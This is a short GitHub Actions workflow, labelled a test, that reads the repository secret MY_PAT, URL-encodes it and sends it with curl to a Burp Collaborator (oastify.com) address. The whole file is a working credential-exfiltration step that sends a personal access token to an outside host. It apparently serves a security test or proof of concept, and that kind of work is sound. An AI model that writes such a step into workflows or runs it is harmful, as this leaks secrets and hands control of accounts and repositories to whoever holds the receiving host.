name: Send PAT to Collaborator (Test)

on:
  workflow_dispatch:

jobs:
  send-pat:
    runs-on: ubuntu-latest

    steps:
      - name: Send PAT to collaborator
        env:
          COLLAB_URL: "http://pyr473mv5r7jghw2amsfw8xtikobc2gq5.oastify.com"
          PAT: ${{ secrets.MY_PAT }}
        run: |
          # URL encode PAT to avoid HTTP errors
          sudo apt-get update && sudo apt-get install -y jq
          PAT_ENC=$(echo -n "$PAT" | jq -sRr @uri)
          curl -s "${COLLAB_URL}/token?pat=${PAT_ENC}" > /dev/null
